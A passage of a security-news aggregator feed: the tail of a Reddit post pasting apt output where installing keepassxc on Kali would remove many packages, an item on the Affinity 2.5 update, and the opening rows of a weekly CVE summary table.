libvo-aacenc0 libvo-amrwbenc0 libvorbis0a libvorbisenc2 libvorbisfile3 libvpl2 libvpx8 libvpx8:i386 libvte-2.91-common libwavpack1 libwbclient0 libwebpmux3:i386 libwebrtc-audio-processing1 libwildmidi2 libwinpr2-2 libwireshark-data libwireshark17 libwiretap14 libwmflite-0.2-7 libwnck-3-common libwoff1 libwpe-1.0-1 libwpebackend-fdo-1.0-1 libwsutil15 libx11-dev libx264-164 libx264-164:i386 libxau-dev libxcb-damage0 libxcb1-dev libxdamage1:i386 libxdmcp-dev libxdo3 libxext-dev libxfce4ui-common libxfce4util-bin libxfce4util-common libxfce4util7 libxfconf-0-3 libxkbregistry0 libxklavier16 libxm4 libxml++2.6-2v5 libxml2-dev libxmlb2 libxmlsec1 libxmlsec1-openssl libxpresent1 libxres1 libxsimd-dev libxt-dev libxvidcore4 libxvidcore4:i386 libyajl2 libyaml-tiny-perl libz3-dev libzbar0 libzimg2 libzix-0-0 libzvbi-common libzxing3 llvm-16-runtime llvm-16-tools mariadb-client mariadb-client-core mariadb-common mariadb-server-core mate-calc-common mate-polkit-common mesa-va-drivers mesa-va-drivers:i386 mesa-vdpau-drivers mesa-vdpau-drivers:i386 mingw-w64 mingw-w64-common mingw-w64-i686-dev mingw-w64-x86-64-dev mobile-broadband-provider-info modemmanager mono-4.0-gac mosquitto mupdf-tools mysql-common netpbm netstandard-targeting-pack-2.1 notus-scanner nsis nsis-common onboard-common openfortivpn oracle-instantclient-basic p11-kit p11-kit-modules pkg-config pkgconf pkgconf-bin pocketsphinx-en-us polenum poppler-data postgresql-client-common postgresql-common ppp pptp-linux proj-data pulseaudio-utils pv python-odf-doc python-odf-tools python-tables-data python-tinycss2-common python3-ajpy python3-alembic python3-altgraph python3-amqp python3-anyjson python3-apispec python3-apispec-webframeworks python3-arrow python3-autobahn python3-base58 python3-beniget python3-bidict python3-billiard python3-bleach python3-bottle python3-bottleneck python3-brlapi python3-cbor python3-celery python3-cffi python3-cli-helpers python3-click-didyoumean python3-click-repl python3-cmd2 python3-configobj python3-cvss python3-dbus python3-defusedxml python3-distro python3-django python3-docopt python3-donut python3-dropbox python3-ecdsa python3-email-validator python3-engineio python3-ephem python3-faraday-agent-parameters-types python3-faraday-plugins python3-feedparser python3-filedepot python3-filteralchemy python3-flask-celery-helper python3-flask-classful python3-flask-kvsession python3-flask-limiter python3-flask-login python3-flask-mail python3-flask-principal python3-flask-socketio python3-flask-sqlalchemy python3-flaskext.wtf python3-flatbuffers python3-gast python3-gevent python3-gevent-websocket python3-gitdb python3-gnupg python3-gpg python3-greenlet python3-html2text python3-humanize python3-hupper python3-ipy python3-jose python3-jq python3-jwt python3-kombu python3-log-symbols python3-louis python3-macholib python3-markdown python3-marshmallow python3-marshmallow-sqlalchemy python3-memcache python3-mnemonic python3-mysqldb python3-nplusone python3-numexpr python3-odf python3-opengl python3-ordered-set python3-paho-mqtt python3-pandas python3-pandas-lib python3-pefile python3-pendulum python3-plaster python3-plaster-pastedeploy python3-ply python3-png python3-psutil python3-psycogreen python3-py-sneakers python3-pyatspi python3-pycparser python3-pydispatch python3-pyfiglet python3-pyinstaller python3-pymysql python3-pyotp python3-pyqrcode python3-pyqt5.sip python3-pyqt6.sip python3-pyramid python3-pyshodan python3-pysmi python3-pysnmp4 python3-pytzdata python3-qasync python3-qrcode python3-rsa python3-secretsocks python3-serial-asyncio python3-setproctitle python3-sgmllib3k python3-sh python3-shtab python3-simple-rest-client python3-simplekv python3-slugify python3-smmap python3-snappy python3-socketio python3-speechd python3-spinners python3-sqlalchemy python3-sqlalchemy-ext python3-sqlalchemy-schemadisplay python3-sqlalchemy-utc python3-sqlparse python3-status python3-stone python3-syslog-rfc5424-formatter python3-tabulate python3-tdb python3-tinycss2 python3-tld python3-translationstring python3-trie python3-txaio python3-u-msgpack python3-ubjson python3-unidecode python3-validators python3-venusian python3-vine python3-webargs python3-websocket python3-websockify python3-wsaccel python3-wtforms python3-xdg python3-xlrd python3-xlutils python3-xlwt python3-yaswfp python3-zapv2 python3-zlib-wrapper python3-zope.deprecation python3-zope.event python3.12-dev qt6-base-dev-tools qtbase5-dev-tools qtchooser redis-server redis-tools rpm rpm-common rpm2cpio rsh-redone-client rsync rtkit ruby-activesupport ruby-builder ruby-concurrent ruby-domain-name ruby-erubi ruby-ffi ruby-get-process-mem ruby-gyoku ruby-http-cookie ruby-httpclient ruby-i18n ruby-little-plugger ruby-logging ruby-multi-json ruby-nori ruby-ntlm ruby-oj ruby-opt-parse-validator ruby-progressbar ruby-sqlite3 ruby-tzinfo ruby-unf ruby-unf-ext ruby-yajl ruby-zeitwerk runit-helper rwho rwhod samba-ad-provision samba-common sane-airscan sgml-data sound-icons sound-theme-freedesktop sparta-scripts sqlite3 ssl-cert starkiller strongswan-libcharon strongswan-starter sysstat system-tools-backends tango-icon-theme tdb-tools thunar-data timgm6mb-soundfont toilet-fonts tumbler-common unicornscan unixodbc-common upower urlscan usb-modeswitch usb-modeswitch-data usb.ids usbmuxd va-driver-all va-driver-all:i386 vdpau-driver-all vdpau-driver-all:i386 wapiti wpasupplicant x11-apps x11-session-utils x11proto-dev xbitmaps xbrlapi xdg-dbus-proxy xdotool xfce4-helpers xfce4-power-manager-data xfconf xfdesktop4-data xinit xkbset xorg xorg-sgml-doctools xsltproc xtl-dev xtrans-dev yelp-xsl zenity-common Use 'sudo apt autoremove' to remove them. The following additional packages will be installed: at-spi2-common at-spi2-core atril-common bsdextrautils bsdutils cadaver eject engrampa-common fdisk gdal-data gdal-plugins gir1.2-atk-1.0 gir1.2-atspi-2.0 gir1.2-glib-2.0 gir1.2-gstreamer-1.0 gir1.2-pango-1.0 gnutls-bin greenbone-feed-sync gstreamer1.0-gl gstreamer1.0-plugins-base gstreamer1.0-plugins-base:i386 gstreamer1.0-x gtk-update-icon-cache gvmd-common kali-hidpi-mode ldap-utils libaec0 libarmadillo12 libarpack2t64 libasound2-data libatk-adaptor libatk-bridge2.0-0t64 libatk1.0-0t64 libatspi2.0-0t64 libavutil58 libavutil58:i386 libblkid1 libblkid1:i386 libbotan-2-19 libc-bin libc-dev-bin libc-devtools libc-l10n libc6 libc6:i386 libc6-dev libc6-i386 libcairo-gobject2 libcairo-gobject2:i386 libcairo-script-interpreter2 libcairo2 libcairo2:i386 libchromaprint1 libcloudproviders0 libcloudproviders0:i386 libcolord2 libcolord2:i386 libdecor-0-0 libdecor-0-0:i386 libdw1t64 libdw1t64:i386 libelf1t64 libelf1t64:i386 libfdisk1 libfreetype6 libfreetype6:i386 libgck-1-0 libgcr-base-3-1 libgd3 libgd3:i386 libgdk-pixbuf-2.0-0 libgdk-pixbuf-2.0-0:i386 libgdk-pixbuf2.0-common libglib2.0-0t64 libglib2.0-0t64:i386 libglib2.0-bin libglib2.0-data libgnutls-dane0t64 libgnutls30t64 libgnutls30t64:i386 libgs10-common libgstreamer-gl1.0-0 libgstreamer-plugins-base1.0-0 libgstreamer-plugins-base1.0-0:i386 libgstreamer1.0-0 libgstreamer1.0-0:i386 libgtk-3-common libharfbuzz0b libharfbuzz0b:i386 libhdf4-0-alt libhogweed6t64 libhogweed6t64:i386 libjavascriptcoregtk-4.1-0 libldap-2.5-0 libldap-2.5-0:i386 libllvm17t64 libllvm17t64:i386 libminizip1t64 libmount1 libmount1:i386 libmtdev1t64 libneon27t64-gnutls libnettle8t64 libnettle8t64:i386 libnm0 liborc-0.4-0t64 liborc-0.4-0t64:i386 libpango-1.0-0 libpango-1.0-0:i386 libpangocairo-1.0-0 libpangocairo-1.0-0:i386 libpangoft2-1.0-0 libpangoft2-1.0-0:i386 libpangoxft-1.0-0 libpng16-16t64 libpng16-16t64:i386 libqt5concurrent5t64 libqt5core5t64 libqt5dbus5t64 libqt5gui5t64 libqt5network5t64 libqt5sql5-sqlite libqt5sql5t64 libqt5widgets5t64 libreadline8t64 librsvg2-2 librsvg2-2:i386 librsvg2-common librsvg2-common:i386 librtmp1 librtmp1:i386 libsane-common libsasl2-modules libsasl2-modules:i386 libsharpyuv0 libsharpyuv0:i386 libsmartcols1 libsnappy1v5 libsnappy1v5:i386 libsphinxbase3t64 libssl3t64 libssl3t64:i386 libswscale7 libsz2 libtalloc2 libtspi1 libuuid1 libvte-2.91-common libwebp7 libwebp7:i386 libwebpmux3 libwebpmux3:i386 libwrap0 libzvbi-common libzxcvbn0 locales mariadb-common mesa-va-drivers mesa-va-drivers:i386 mesa-vdpau-drivers mesa-vdpau-drivers:i386 mesa-vulkan-drivers mount openssl php8.2 php8.2-cli php8.2-common php8.2-fpm php8.2-mysql php8.2-opcache php8.2-readline proj-data python3-faraday-agent-parameters-types python3-faraday-plugins python3-numpy python3-scipy python3-shtab python3-unicodedata2 qtbase5-dev-tools readline-common rfkill samba-common tumbler-common util-linux util-linux-extra zlib1g zlib1g:i386 zlib1g-dev Suggested packages: gvfs:i386 libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal alsa-utils glibc-doc libnss-nis libnss-nisplus glibc-doc:i386 locales:i386 libnss-nis:i386 libnss-nisplus:i386 colord colord:i386 libgd-tools libgd-tools:i386 low-memory-monitor low-memory-monitor:i386 libvisual-0.4-plugins libvisual-0.4-plugins:i386 gstreamer1.0-tools gstreamer1.0-tools:i386 libhdf4-alt-dev hdf4-tools qgnomeplatform-qt5 qt5-image-formats-plugins librsvg2-bin librsvg2-bin:i386 libsasl2-modules-ldap libsasl2-modules-otp libsasl2-modules-sql libsasl2-modules-gssapi-mit:i386 | libsasl2-modules-gssapi-heimdal:i386 libsasl2-modules-ldap:i386 libsasl2-modules-otp:i386 libsasl2-modules-sql:i386 uuid-runtime nfs-common php-pear gfortran python-numpy-doc python3-dev python3-pytest python-scipy-doc readline-doc libtumbler-1-0t64 util-linux-locales Recommended packages: alsa-ucm-conf default-libdecor-0-plugin-1 | libdecor-0-plugin-1 default-libdecor-0-plugin-1:i386 | libdecor-0-plugin-1:i386 libgtk-3-0t64 qt5-gtk-platformtheme samba-common-bin The following packages will be REMOVED: alsa-ucm-conf apache2 apache2-bin aspnetcore-runtime-6.0 atril autopsy bind9-dnsutils bind9-host bind9-libs bloodhound blueman bluez burpsuite ca-certificates-mono catfish cherrytree cifs-utils colord commix curl curlftpfs cutycapt default-jre default-jre-headless default-mysql-server dirb dirbuster dotnet-runtime-6.0 dotnet-runtime-deps-6.0 dotnet-sdk-6.0 dsniff dvisvgm engrampa enum4linux ettercap-common ettercap-graphical evil-winrm exo-utils faraday faraday-agent-dispatcher faraday-cli fern-wifi-cracker firefox-esr freerdp2-x11 gcr geoclue-2.0 ghostscript gir1.2-ayatanaappindicator3-0.1 gir1.2-gtk-3.0 gir1.2-vte-2.91 gir1.2-wnck-3.0 git gnome-disk-utility gnome-keyring gnome-system-tools gparted gss-ntlmssp gstreamer1.0-libav gstreamer1.0-plugins-bad gstreamer1.0-plugins-good gtkhash gvfs-backends gvmd hydra hydra-gtk ifenslave ifupdown iproute2 isc-dhcp-client kali-desktop-core kali-desktop-xfce kali-linux-core kali-linux-default kali-linux-headless kali-system-cli kali-system-core kali-system-gui kali-tools-top10 kali-undercover legion libadwaita-1-0 libafflib0v5 libapache2-mod-php libapache2-mod-php8.2 libappstream5 libarpack2 libasound2 libasound2-plugins libasound2-plugins:i386 libatk-bridge2.0-0 libatk-bridge2.0-0:i386 libatk1.0-0 libatk1.0-0:i386 libatrildocument3 libatrilview3 libatspi2.0-0 libatspi2.0-0:i386 libavcodec60 libavcodec60:i386 libavfilter9 libavformat60 libayatana-appindicator3-1 libayatana-ido3-0.4-0 libayatana-indicator3-7 libcaja-extension1 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra0 libcfitsio10 libct4 libcups2 libcups2:i386 libcurl3-gnutls libcurl4 libdecor-0-plugin-1-gtk libdecor-0-plugin-1-gtk:i386 libdw1 libdw1:i386 libelf1 libelf1:i386 libespeak-ng1 libexo-2-0 libflite1 libfluidsynth3 libfreerdp-client2-2 libfreerdp2-2 libgail-common libgail18 libgarcon-gtk3-1-0 libgcr-ui-3-1 libgdal34 libgdata22 libgeotiff5 libgfapi0 libgfrpc0 libgfxdr0 libglib2.0-0 libglib2.0-0:i386 libgnutls-dane0 libgnutls30 libgnutls30:i386 libgphoto2-6 libgs10 libgspell-1-2 libgssdp-1.6-0 libgstreamer-plugins-bad1.0-0 libgtk-3-0 libgtk-3-0:i386 libgtk-3-bin libgtk-4-1 libgtk-4-bin libgtk-4-media-gstreamer libgtk-layer-shell0 libgtk2.0-0 libgtk2.0-bin libgtkmm-3.0-1v5 libgtksourceview-3.0-1 libgtksourceview-4-0 libgtksourceviewmm-3.0-0v5 libgupnp-1.6-0 libgupnp-igd-1.6-0 libgvm22 libhandy-1-0 libhdf5-103-1 libhdf5-hl-100 libhogweed6 libhogweed6:i386 libkeybinder-3.0-0 libllvm17 libllvm17:i386 liblrdf0 libminizip1 libmono-corlib4.5-cil libmono-i18n-west4.0-cil libmono-i18n4.0-cil libmono-microsoft-csharp4.0-cil libmousepad0 libmtdev1 libneon27 libneon27-gnutls libnetcdf19 libnettle8 libnettle8:i386 libnice10 libnma-gtk4-0 libnma0 libnsl-dev libogdi4.1 libopenal1 libopenconnect5 liborc-0.4-0 liborc-0.4-0:i386 libpcaudio0 libpipewire-0.3-0 libpipewire-0.3-modules libpng16-16 libpng16-16:i386 libportaudio2 libportmidi0 libpq5 libproj25 libpython3-all-dev libpython3-dev libpython3.11 libpython3.11-dev libqscintilla2-qt5-15 libqt5core5a libqt5dbus5 libqt5gui5 libqt5network5 libqt5printsupport5 libqt5sql5 libqt5webkit5 libqt5widgets5 libqt6multimedia6 libqt6network6 libqt6printsupport6 libqt6qml6 libqt6qmlmodels6 libqt6quick6 libqt6waylandcompositor6 libqt6waylandeglcompositorhwintegration6 libraptor2-0 libreadline8 libsane1 libsdl2-2.0-0 libsdl2-image-2.0-0 libsdl2-mixer-2.0-0 libsdl2-ttf-2.0-0 libserf-1-1 libsmbclient libsnapd-glib-2-1 libsndio7.0 libsoup-3.0-0 libsoup2.4-1 libspa-0.2-bluetooth libspa-0.2-modules libspatialite8 libspectre1 libsphinxbase3 libssh-4 libssh-gcrypt-4 libssl3 libssl3:i386 libsvn1 libsybdb5 libthunarx-3-0 libtirpc-dev libtsk19 libvte-2.91-0 libwebkit2gtk-4.1-0 libwine libwireplumber-0.4-0 libwnck-3-0 libxerces-c3.2 libxfce4panel-2.0-4 libxfce4ui-2-0 libxfce4ui-utils libyelp0 libzmq5 libzvbi0 libzvbi0:i386 light-locker lightdm lightdm-gtk-greeter lightdm-gtk-greeter-settings llvm-16 llvm-16-dev magicrescue mariadb-plugin-provider-bzip2 mariadb-plugin-provider-lz4 mariadb-plugin-provider-lzma mariadb-plugin-provider-lzo mariadb-plugin-provider-snappy mariadb-server mate-calc mate-polkit medusa mesa-vulkan-drivers:i386 metasploit-framework miredo mono-gac mono-mcs mono-runtime mono-runtime-common mono-runtime-sgen mousepad mpg123 msfpc neo4j network-manager network-manager-fortisslvpn network-manager-fortisslvpn-gnome network-manager-gnome network-manager-l2tp network-manager-l2tp-gnome network-manager-openconnect network-manager-openconnect-gnome network-manager-openvpn network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-vpnc network-manager-vpnc-gnome nfs-common nginx nginx-common onboard onboard-data openconnect openjdk-11-jre openjdk-11-jre-headless openjdk-17-jre openjdk-17-jre-headless openssh-client openssh-server openssh-sftp-server openvas-scanner orca ospd-openvas parole passing-the-hash patator pavucontrol pgcli pinentry-gnome3 pipewire pipewire-bin pipewire-pulse policykit-1-gnome postgresql postgresql-16 postgresql-16-pg-gvm postgresql-client-16 powershell powershell-empire proj-bin pulseaudio pyqt5-dev-tools pyqt6-dev-tools python3-all-dev python3-dev python3-gdal python3-git python3-gvm python3-ldb python3-pgspecial python3-psycopg python3-psycopg2 python3-pycurl python3-pyexploitdb python3-pygame python3-pymssql python3-pyqt5 python3-pyqt5.qtopengl python3-pyqt6 python3-pyqtgraph python3-pythran python3-pyvnc python3-samba python3-tables python3-tables-lib python3-talloc python3.11-dev qt5-gtk-platformtheme qt6-gtk-platformtheme qt6-qpa-plugins qt6-wayland rdesktop recordmydesktop ristretto rpcbind ruby-cms-scanner ruby-ethon ruby-gssapi ruby-typhoeus ruby-winrm ruby-winrm-fs samba samba-common-bin samba-dsdb-modules samba-libs samba-vfs-modules sane-utils set sleuthkit smbclient speech-dispatcher speech-dispatcher-audio-plugins speech-dispatcher-espeak-ng spooftooph sqlitebrowser sqsh strongswan strongswan-charon subversion thunar thunar-archive-plugin thunar-gtkhash thunar-volman tshark tumbler udptunnel unicorn-magic veil vlan wfuzz wifite wine64 winexe wireplumber wireshark wireshark-common wpscan xdg-desktop-portal xdg-desktop-portal-gtk xdg-user-dirs-gtk xfce4 xfce4-appfinder xfce4-battery-plugin xfce4-clipman xfce4-clipman-plugin xfce4-cpufreq-plugin xfce4-cpugraph-plugin xfce4-datetime-plugin xfce4-diskperf-plugin xfce4-fsguard-plugin xfce4-genmon-plugin xfce4-netload-plugin xfce4-notifyd xfce4-panel xfce4-places-plugin xfce4-power-manager xfce4-power-manager-plugins xfce4-pulseaudio-plugin xfce4-screenshooter xfce4-sensors-plugin xfce4-session xfce4-settings xfce4-systemload-plugin xfce4-taskmanager xfce4-timer-plugin xfce4-verve-plugin xfce4-wavelan-plugin xfce4-whiskermenu-plugin xfce4-xkb-plugin xfdesktop4 xfwm4 xiccd yelp zenity The following NEW packages will be installed: keepassxc libarpack2t64 libatk-bridge2.0-0t64 libatk1.0-0t64 libatspi2.0-0t64 libbotan-2-19 libdw1t64 libdw1t64:i386 libelf1t64 libelf1t64:i386 libglib2.0-0t64 libglib2.0-0t64:i386 libgnutls-dane0t64 libgnutls30t64 libgnutls30t64:i386 libhogweed6t64 libhogweed6t64:i386 libllvm17t64 libllvm17t64:i386 libminizip1t64 libmtdev1t64 libneon27t64-gnutls libnettle8t64 libnettle8t64:i386 liborc-0.4-0t64 liborc-0.4-0t64:i386 libpng16-16t64 libpng16-16t64:i386 libqt5concurrent5t64 libqt5core5t64 libqt5dbus5t64 libqt5gui5t64 libqt5network5t64 libqt5sql5t64 libqt5widgets5t64 libreadline8t64 libsphinxbase3t64 libssl3t64 libssl3t64:i386 libtspi1 libzxcvbn0 php8.2-fpm python3-shtab python3-unicodedata2 The following packages will be upgraded: at-spi2-common at-spi2-core atril-common bsdextrautils bsdutils cadaver eject engrampa-common fdisk gdal-data gdal-plugins gir1.2-atk-1.0 gir1.2-atspi-2.0 gir1.2-glib-2.0 gir1.2-gstreamer-1.0 gir1.2-pango-1.0 gnutls-bin greenbone-feed-sync gstreamer1.0-gl gstreamer1.0-plugins-base gstreamer1.0-plugins-base:i386 gstreamer1.0-x gtk-update-icon-cache gvmd-common kali-hidpi-mode ldap-utils libaec0 libarmadillo12 libasound2-data libatk-adaptor libavutil58 libavutil58:i386 libblkid1 libblkid1:i386 libc-bin libc-dev-bin libc-devtools libc-l10n libc6 libc6:i386 libc6-dev libc6-i386 libcairo-gobject2 libcairo-gobject2:i386 libcairo-script-interpreter2 libcairo2 libcairo2:i386 libchromaprint1 libcloudproviders0 libcloudproviders0:i386 libcolord2 libcolord2:i386 libdecor-0-0 libdecor-0-0:i386 libfdisk1 libfreetype6 libfreetype6:i386 libgck-1-0 libgcr-base-3-1 libgd3 libgd3:i386 libgdk-pixbuf-2.0-0 libgdk-pixbuf-2.0-0:i386 libgdk-pixbuf2.0-common libglib2.0-bin libglib2.0-data libgs10-common libgstreamer-gl1.0-0 libgstreamer-plugins-base1.0-0 libgstreamer-plugins-base1.0-0:i386 libgstreamer1.0-0 libgstreamer1.0-0:i386 libgtk-3-common libharfbuzz0b libharfbuzz0b:i386 libhdf4-0-alt libjavascriptcoregtk-4.1-0 libldap-2.5-0 libldap-2.5-0:i386 libmount1 libmount1:i386 libnm0 libpango-1.0-0 libpango-1.0-0:i386 libpangocairo-1.0-0 libpangocairo-1.0-0:i386 libpangoft2-1.0-0 libpangoft2-1.0-0:i386 libpangoxft-1.0-0 libqt5sql5-sqlite librsvg2-2 librsvg2-2:i386 librsvg2-common librsvg2-common:i386 librtmp1 librtmp1:i386 libsane-common libsasl2-modules libsasl2-modules:i386 libsharpyuv0 libsharpyuv0:i386 libsmartcols1 libsnappy1v5 libsnappy1v5:i386 libswscale7 libsz2 libtalloc2 libuuid1 libvte-2.91-common libwebp7 libwebp7:i386 libwebpmux3 libwebpmux3:i386 libwrap0 libzvbi-common locales mariadb-common mesa-va-drivers mesa-va-drivers:i386 mesa-vdpau-drivers mesa-vdpau-drivers:i386 mesa-vulkan-drivers mount openssl php8.2 php8.2-cli php8.2-common php8.2-mysql php8.2-opcache php8.2-readline proj-data python3-faraday-agent-parameters-types python3-faraday-plugins python3-numpy python3-scipy qtbase5-dev-tools readline-common rfkill samba-common tumbler-common util-linux util-linux-extra zlib1g zlib1g:i386 zlib1g-dev </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/DoronumaNoRudeus"> /u/DoronumaNoRudeus </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ddb3ho/keepassxc_deleting_dependencies_making_my_debian/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ddb3ho/keepassxc_deleting_dependencies_making_my_debian/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Affinity update adds QR code generator, variable font support]]></title>
<description><![CDATA[Affinity 2.5 is here, with a handful of new tools including a QR code generator, some user experience upgrades, and support for ARM on Windows.Affinity's new QR code generatorAffinity, known for its line of creative software geared toward photographers and designers, has rolled out Affinity 2.5, ...]]></description>
<link>https://tsecurity.de/de/2146672/ios-mac-os/affinity-update-adds-qr-code-generator-variable-font-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2146672/ios-mac-os/affinity-update-adds-qr-code-generator-variable-font-support/</guid>
<pubDate>Mon, 13 May 2024 12:30:37 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Affinity 2.5 is here, with a handful of new tools including a QR code generator, some user experience upgrades, and support for ARM on Windows.<br><br><div><img src="https://photos5.appleinsider.com/gallery/59780-122239-QRCode-xl.jpg" alt="Concert poster for Undergrounds Final Tour with QR code for tickets and merch. Various dates listed, some sold out. Musician playing guitar in background." height="738"><br><span>Affinity's new QR code generator</span></div><br>Affinity, known for its line of creative software geared toward photographers and designers, has rolled out Affinity 2.5, the first update since the company <a href="https://appleinsider.com/articles/24/03/27/canvas-affinity-deal-will-shake-the-adobe-status-quo">was acquired by Canva in March.</a><br><br>The new update brings a new QR code generator to all three programs, allowing users to quickly add codes to their documents. The codes can be scanned to perform actions, such as visiting websites, initiating phone calls, sharing contact info vCards, or launching <a href="https://appleinsider.com/inside/facetime" title="FaceTime" data-kpt="1">FaceTime</a> or WhatsApp.<br><br><br> <a href="https://appleinsider.com/articles/24/05/23/affinity-update-adds-qr-code-generator-variable-font-support?utm_medium=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/236508?utm_medium=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability Summary for the Week of May 13, 2024]]></title>
<description><![CDATA[High Vulnerabilities



PrimaryVendor -- Product
Description
Published
CVSS Score
Source & Patch Info




8theme--XStore Core 
Improper Privilege Management vulnerability in 8theme XStore Core allows Privilege Escalation.This issue affects XStore Core: from n/a through 5.3.8.
2024-05-17
9.8
CVE-2...]]></description>
<link>https://tsecurity.de/de/2141243/it-security-nachrichten/vulnerability-summary-for-the-week-of-may-13-2024/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2141243/it-security-nachrichten/vulnerability-summary-for-the-week-of-may-13-2024/</guid>
<pubDate>Fri, 10 May 2024 09:09:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<h2>High Vulnerabilities</h2>
<table summary="High Vulnerabilities" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th scope="col" role="columnheader" data-tablesaw-priority="persist">Primary<br>Vendor -- Product</th>
<th scope="col" role="columnheader">Description</th>
<th scope="col" role="columnheader">Published</th>
<th scope="col" role="columnheader">CVSS Score</th>
<th scope="col" role="columnheader">Source &amp; Patch Info</th>
</tr>
</thead>
<tbody>
<tr>
<td>8theme--XStore Core<br> </td>
<td>Improper Privilege Management vulnerability in 8theme XStore Core allows Privilege Escalation.This issue affects XStore Core: from n/a through 5.3.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33552&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33552" target="_blank">CVE-2024-33552</a><br><a href="https://patchstack.com/database/vulnerability/et-core-plugin/wordpress-xstore-core-plugin-5-3-5-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>8theme--XStore Core<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in 8theme XStore Core.This issue affects XStore Core: from n/a through 5.3.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33556&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33556" target="_blank">CVE-2024-33556</a><br><a href="https://patchstack.com/database/vulnerability/et-core-plugin/wordpress-xstore-core-plugin-5-3-5-limited-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>AA-Team--WZone<br> </td>
<td>Improper Privilege Management vulnerability in AA-Team WZone allows Privilege Escalation.This issue affects WZone: from n/a through 14.0.10.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33549&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33549" target="_blank">CVE-2024-33549</a><br><a href="https://patchstack.com/database/vulnerability/woozone/wordpress-wzone-plugin-14-0-10-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ABB--RobotWare 6<br> </td>
<td>An attacker who successfully exploited these vulnerabilities could cause the robot to stop, make the robot controller inaccessible, or execute arbitrary code.  The vulnerability could potentially be exploited to perform unauthorized actions by an attacker. This vulnerability arises under specific condition when specially crafted message is processed by the system. Below are reported vulnerabilities in the Robot Ware versions. * IRC5- RobotWare 6 &lt; 6.15.06 except 6.10.10, and 6.13.07 * OmniCore- RobotWare 7 &lt; 7.14</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1913&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1913" target="_blank">CVE-2024-1913</a><br><a href="https://search.abb.com/library/Download.aspx?DocumentID=SI20330&amp;LanguageCode=en&amp;DocumentPartId=&amp;Action=Launch" target="_blank">cybersecurity@ch.abb.com</a></td>
</tr>
<tr>
<td>AROX SOLUTION--School ERP Pro+Responsive<br> </td>
<td>Vulnerability in School ERP Pro+Responsive 1.0 that allows SQL injection through the '/SchoolERP/office_admin/' index in the parameters groups_id, examname, classes_id, es_voucherid, es_class, etc. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the server and retrieve all the information stored in the database.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4824&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4824" target="_blank">CVE-2024-4824</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-school-erp-proresponsive-arox-solution" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Abdul Hakeem--Build App Online<br> </td>
<td>Improper Privilege Management vulnerability in Abdul Hakeem Build App Online allows Privilege Escalation.This issue affects Build App Online: from n/a through 1.0.19.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51479&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51479" target="_blank">CVE-2023-51479</a><br><a href="https://patchstack.com/database/vulnerability/build-app-online/wordpress-build-app-online-plugin-1-0-19-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Adobe--Acrobat Reader<br> </td>
